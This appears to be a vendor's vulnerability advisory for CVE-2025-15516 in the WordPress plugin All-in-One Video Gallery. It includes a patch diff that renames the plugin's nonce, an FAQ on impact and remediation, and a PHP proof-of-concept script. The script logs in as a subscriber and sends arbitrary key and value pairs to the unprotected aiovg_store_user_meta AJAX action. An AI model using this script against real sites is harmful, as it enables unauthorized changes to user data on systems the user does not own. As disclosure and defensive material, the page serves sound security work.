@@ -194,7 +194,7 @@
 	 * @since 3.6.1
 	 */
 	public function ajax_callback_toggle_dislikes() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );

 		// Proceed safe
 		$response = array(
--- a/all-in-one-video-gallery/public/public.php
+++ b/all-in-one-video-gallery/public/public.php
@@ -241,7 +241,7 @@
 		$likes_settings = aiovg_get_option( 'aiovg_likes_settings' );

 		$ajax_url   = admin_url( 'admin-ajax.php' );
-		$ajax_nonce = wp_create_nonce( 'aiovg_ajax_nonce' );
+		$ajax_nonce = wp_create_nonce( 'aiovg_public_ajax_nonce' );
 		$user_id    = get_current_user_id();

 		$scroll_to_top_offset = 20;
@@ -258,6 +258,31 @@
 		);

 		wp_register_script(
+			AIOVG_PLUGIN_SLUG . '-categories',
+			AIOVG_PLUGIN_URL . 'public/assets/js/categories.min.js',
+			array( 'jquery' ),
+			AIOVG_PLUGIN_VERSION,
+			array( 'strategy' => 'defer' )
+		);
+
+		wp_register_script(
+			AIOVG_PLUGIN_SLUG . '-search',
+			AIOVG_PLUGIN_URL . 'public/assets/js/search.min.js',
+			array( 'jquery' ),
+			AIOVG_PLUGIN_VERSION,
+			array( 'strategy' => 'defer' )
+		);
+
+		wp_localize_script(
+			AIOVG_PLUGIN_SLUG . '-search',
+			'aiovg_search',
+			array(
+				'ajax_url'   => $ajax_url,
+				'ajax_nonce' => $ajax_nonce
+			)
+		);
+
+		wp_register_script(
 			AIOVG_PLUGIN_SLUG . '-pagination',
 			AIOVG_PLUGIN_URL . 'public/assets/js/pagination.min.js',
 			array( 'jquery' ),
@@ -359,6 +384,22 @@
 		);

 		wp_register_script(
+			AIOVG_PLUGIN_SLUG . '-chapters',
+			AIOVG_PLUGIN_URL . 'public/assets/js/chapters.min.js',
+			array( 'jquery' ),
+			AIOVG_PLUGIN_VERSION,
+			array( 'strategy' => 'defer' )
+		);
+
+		wp_localize_script(
+			AIOVG_PLUGIN_SLUG . '-chapters',
+			'aiovg_chapters',
+			array(
+				'scroll_to_top_offset' => $scroll_to_top_offset
+			)
+		);
+
+		wp_register_script(
 			AIOVG_PLUGIN_SLUG . '-public',
 			AIOVG_PLUGIN_URL . 'public/assets/js/public.min.js',
 			array( 'jquery' ),
@@ -370,19 +411,79 @@
 			AIOVG_PLUGIN_SLUG . '-public',
 			'aiovg_public',
 			array(
-				'plugin_url'           => AIOVG_PLUGIN_URL,
-				'plugin_version'       => AIOVG_PLUGIN_VERSION,
-				'ajax_url'             => $ajax_url,
-				'ajax_nonce'           => $ajax_nonce,
-				'scroll_to_top_offset' => $scroll_to_top_offset,
-				'i18n'                 => array(
-					'no_tags_found' => __( 'No tags found', 'all-in-one-video-gallery' )
+				'plugin_url'             => AIOVG_PLUGIN_URL,
+				'plugin_version'         => AIOVG_PLUGIN_VERSION,
+				'user_id'                => $user_id,
+				'ajax_url'               => $ajax_url,
+				'ajax_nonce'             => $ajax_nonce,
+				'show_like_button'       => ( ! empty( $likes_settings['like_button'] ) ? 1 : 0 ),
+				'show_dislike_button'    => ( ! empty( $likes_settings['dislike_button'] ) ? 1 : 0 ),
+				'login_required_to_vote' => ( ! empty( $likes_settings['login_required_to_vote'] ) ? 1 : 0 ),
+				'scroll_to_top_offset'   => $scroll_to_top_offset,
+				'i18n'                   => array(
+					'now_playing'          => __( 'Now Playing', 'all-in-one-video-gallery' ),
+					'no_tags_found'        => __( 'No tags found', 'all-in-one-video-gallery' ),
+					'likes'                => __( 'Likes', 'all-in-one-video-gallery' ),
+					'dislikes'             => __( 'Dislikes', 'all-in-one-video-gallery' ),
+					'alert_login_required' => __( 'Sorry, you must login to vote.', 'all-in-one-video-gallery' )
 				)
 			)
 		);
 	}

 	/**
+	 * Enqueue frontend CSS and JavaScript files based on the "force_load_assets" setting.
+	 *
+	 * @since 4.7.0
+	 */
+	public function enqueue_assets() {
+		if ( is_admin() ) {
+			return;
+		}
+
+		$general_settings = aiovg_get_option( 'aiovg_general_settings' );
+		if ( ! isset( $general_settings['force_load_assets'] ) ) {
+			return;
+		}
+
+		// Styles
+		if ( isset( $general_settings['force_load_assets']['css'] ) ) {
+			wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-icons' );
+			wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );
+		}
+
+		// Scripts
+		if ( isset( $general_settings['force_load_assets']['js'] ) ) {
+			if ( is_singular( 'aiovg_videos' ) ) {
+				$player_settings = aiovg_get_option( 'aiovg_player_settings' );
+
+				if ( isset( $player_settings['controls']['chapters'] ) ) {
+					wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-chapters' );
+				}
+			}
+
+			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+		}
+	}
+
+	/**
+	 * Enqueue Gutenberg block assets for backend editor.
+	 *
+	 * @since 3.6.1
+	 */
+	public function enqueue_block_editor_assets() {
+		// Styles
+		$this->register_styles();
+
+		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );
+
+		// Scripts
+		$this->register_scripts();
+
+		wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-likes' );
+	}
+
+	/**
 	 * Set MySQL's RAND function seed value in a cookie.
 	 *
 	 * @since 3.9.3
@@ -410,23 +511,6 @@
 	}

 	/**
-	 * Enqueue Gutenberg block assets for backend editor.
-	 *
-	 * @since 3.6.1
-	 */
-	public function enqueue_block_editor_assets() {
-		// Styles
-		$this->register_styles();
-
-		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );
-
-		// Scripts
-		$this->register_scripts();
-
-		wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-likes' );
-	}
-
-	/**
 	 * Flush rewrite rules when it's necessary.
 	 *
 	 * @since 1.0.0
@@ -967,7 +1051,7 @@
 	 * @since 1.0.0
 	 */
 	public function set_gdpr_cookie() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );
 		setcookie( 'aiovg_gdpr_consent', 1, time() + ( 86400 * 30 ), COOKIEPATH, COOKIE_DOMAIN );
 		wp_send_json_success();
 	}
--- a/all-in-one-video-gallery/public/search.php
+++ b/all-in-one-video-gallery/public/search.php
@@ -75,7 +75,7 @@
 		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 		if ( empty( $attributes['has_search_button'] ) ) {
-			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-search' );
 		}

 		if ( ! empty( $attributes['has_category'] ) || ! empty( $attributes['has_tag'] ) ) {
--- a/all-in-one-video-gallery/public/templates/player-gdpr.php
+++ b/all-in-one-video-gallery/public/templates/player-gdpr.php
@@ -177,7 +177,7 @@
 				}
 			}

-			xmlhttp.open( 'POST', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_set_cookie&security=<?php echo wp_create_nonce( 'aiovg_ajax_nonce' ); ?>', true );
+			xmlhttp.open( 'POST', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_set_cookie&security=<?php echo wp_create_nonce( 'aiovg_public_ajax_nonce' ); ?>', true );
 			xmlhttp.setRequestHeader( 'Content-type', 'application/x-www-form-urlencoded' );
 			xmlhttp.send( 'action=aiovg_set_cookie' );
 		}
--- a/all-in-one-video-gallery/public/templates/player-iframe.php
+++ b/all-in-one-video-gallery/public/templates/player-iframe.php
@@ -284,7 +284,7 @@
                     }
                 }

-                xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&security=<?php echo wp_create_nonce( 'aiovg_ajax_nonce' ); ?>', true );
+                xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&security=<?php echo wp_create_nonce( 'aiovg_public_ajax_nonce' ); ?>', true );
                 xmlhttp.send();
             }

--- a/all-in-one-video-gallery/public/templates/player-videojs.php
+++ b/all-in-one-video-gallery/public/templates/player-videojs.php
@@ -1514,7 +1514,7 @@

 			var duration = player.duration() || 0;

-			xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&duration=' + duration + '&security=<?php echo wp_create_nonce( 'aiovg_ajax_nonce' ); ?>', true );
+			xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&duration=' + duration + '&security=<?php echo wp_create_nonce( 'aiovg_public_ajax_nonce' ); ?>', true );
 			xmlhttp.send();
 		}

--- a/all-in-one-video-gallery/public/templates/player-vidstack.php
+++ b/all-in-one-video-gallery/public/templates/player-vidstack.php
@@ -686,15 +686,15 @@
             text-decoration: none;
         }

-		/* Custom Theme */
-		.aiovg-player-theme-custom .plyr__control--overlaid {
+		.aiovg-player .plyr__control--overlaid {
 			--plyr-control-spacing: 15px;
 		}

-		.aiovg-player-theme-custom .plyr__control--overlaid svg {
+		.aiovg-player .plyr__control--overlaid svg {
 			--plyr-control-icon-size: 27px;
 		}

+		/* Custom Theme */
 		.aiovg-player-theme-custom .plyr__controls {
 			flex-wrap: wrap;
 			justify-content: flex-start;
@@ -1118,7 +1118,7 @@

 			var duration = player.duration || 0;

-			xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&duration=' + duration + '&security=<?php echo wp_create_nonce( 'aiovg_ajax_nonce' ); ?>', true );
+			xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&duration=' + duration + '&security=<?php echo wp_create_nonce( 'aiovg_public_ajax_nonce' ); ?>', true );
 			xmlhttp.send();
 		}

--- a/all-in-one-video-gallery/public/video.php
+++ b/all-in-one-video-gallery/public/video.php
@@ -519,7 +519,7 @@
 			wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 			if ( isset( $player_settings['controls']['chapters'] ) ) {
-				wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+				wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-chapters' );
 			}

 			// Process output
@@ -572,7 +572,7 @@
 			$post_id = (int) $_REQUEST['post_id'];

 			if ( $post_id > 0 ) {
-				check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+				check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );
 				aiovg_update_views_count( $post_id );

 				// Update video duration if applicable
--- a/all-in-one-video-gallery/public/videos.php
+++ b/all-in-one-video-gallery/public/videos.php
@@ -475,7 +475,7 @@
 	 */
 	public function ajax_callback_load_videos() {
 		// Security check
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );

 		// Proceed safe
 		$attributes = array();
--- a/all-in-one-video-gallery/widgets/categories.php
+++ b/all-in-one-video-gallery/widgets/categories.php
@@ -101,7 +101,7 @@
 		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 		if ( 'dropdown' == $template ) {
-			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-categories' );
 		}

 		// Process output
--- a/all-in-one-video-gallery/widgets/search.php
+++ b/all-in-one-video-gallery/widgets/search.php
@@ -87,7 +87,7 @@
 		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 		if ( empty( $attributes['has_search_button'] ) ) {
-			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-search' );
 		}

 		if ( ! empty( $attributes['has_category'] ) || ! empty( $attributes['has_tag'] ) ) {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15516 - All-in-One Video Gallery 4.1.0 - 4.6.4 - Missing Authorization to Authenticated (Subscriber+) Limited User Meta Update

<?php
/**
 * Proof of Concept for CVE-2025-15516
 * Demonstrates unauthorized user meta update via missing capability check
 * Requires: WordPress installation with All-in-One Video Gallery plugin (v4.1.0-4.6.4)
 *           Valid subscriber-level credentials
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS
$username = 'subscriber'; // CHANGE THIS
$password = 'password'; // CHANGE THIS

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/x-www-form-urlencoded'
    ]
]);

$response = curl_exec($ch);

// Step 2: Extract the security nonce from admin page
// The nonce is available to all authenticated users via wp_create_nonce('aiovg_ajax_nonce')
// In practice, we can load a page that includes the nonce or generate it if we know the user ID
// For this PoC, we'll simulate by loading the admin page
$admin_url = $target_url . '/wp-admin/admin.php?page=all-in-one-video-gallery';
curl_setopt_array($ch, [
    CURLOPT_URL => $admin_url,
    CURLOPT_POST => false
]);

$admin_page = curl_exec($ch);

// Step 3: Exploit the vulnerable AJAX endpoint
// The ajax_callback_store_user_meta() function accepts arbitrary key/value pairs
$payload = [
    'action' => 'aiovg_store_user_meta',
    'security' => 'EXTRACTED_NONCE', // Replace with actual nonce from page
    'key' => 'arbitrary_meta_key', // Any string-based meta key
    'value' => 'malicious_value' // Any string value
];

curl_setopt_array($ch, [
    CURLOPT_URL => $ajax_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query($payload),
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/x-www-form-urlencoded',
        'X-Requested-With: XMLHttpRequest'
    ]
]);

$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

// Clean up
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}

echo "Exploit attempt completed. HTTP Code: $http_coden";
echo "If vulnerable, the user meta 'arbitrary_meta_key' was updated to 'malicious_value'.n";

// Note: This PoC requires extracting the actual nonce from the page.
// In a real attack, the attacker would parse the nonce from JavaScript variables
// or generate it using their authenticated session.
?>

Frequently Asked Questions

What is CVE-2025-15516?
Overview of the vulnerability
CVE-2025-15516 is a security vulnerability in the All-in-One Video Gallery plugin for WordPress, affecting versions 4.1.0 to 4.6.4. It allows authenticated users with Subscriber-level access and above to update arbitrary user meta data due to a missing authorization check in the ajax_callback_store_user_meta() function.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability arises because the ajax_callback_store_user_meta() function does not verify if the authenticated user has the necessary capabilities to modify user meta. An attacker can send a POST request to the admin-ajax.php endpoint with specific parameters to change their own user meta data.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the All-in-One Video Gallery plugin versions 4.1.0 to 4.6.4 is at risk. Specifically, authenticated users with Subscriber-level roles can exploit this vulnerability to update their own user meta.
How can I check if my site is affected?
Verifying plugin version
To determine if your site is affected, check the version of the All-in-One Video Gallery plugin installed. If it is between 4.1.0 and 4.6.4, your site is vulnerable and should be updated.
What is the severity level of this vulnerability?
Understanding the risk
CVE-2025-15516 has a CVSS score of 4.3, classified as Medium severity. This indicates that while the vulnerability requires authentication to exploit, it could lead to unauthorized changes that might affect site functionality or user privileges.
How can I fix this vulnerability?
Steps to mitigate the issue
To fix CVE-2025-15516, update the All-in-One Video Gallery plugin to version 4.7.1 or later, where the vulnerability has been patched. Regularly check for updates to ensure your plugins are secure.
What are the potential risks of this vulnerability?
Consequences of exploitation
If exploited, attackers can modify their own user meta data, which may lead to privilege escalation or disruption of plugin functionality. This can result in unauthorized access to features or data that rely on user meta values.
What changes were made in the patch?
Improvements in the updated version
The patch for CVE-2025-15516 introduces capability checks to ensure only users with appropriate permissions can modify user meta. It also restricts the keys that can be modified and improves data sanitization.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to update their user meta. It illustrates the lack of capability checks that allows this unauthorized modification.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the All-in-One Video Gallery plugin until it can be updated. Additionally, review user roles and limit access to only those who require it.
Are there any other security best practices to follow?
General recommendations
In addition to updating plugins, regularly audit your WordPress site for vulnerabilities, use strong passwords, and implement security plugins that monitor for unauthorized changes. Keeping backups is also essential.
Where can I find more information about this vulnerability?
Resources for further reading
More details about CVE-2025-15516 can be found on the National Vulnerability Database (NVD) or the CVE Details website. Additionally, the plugin’s changelog may provide insights into security updates.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations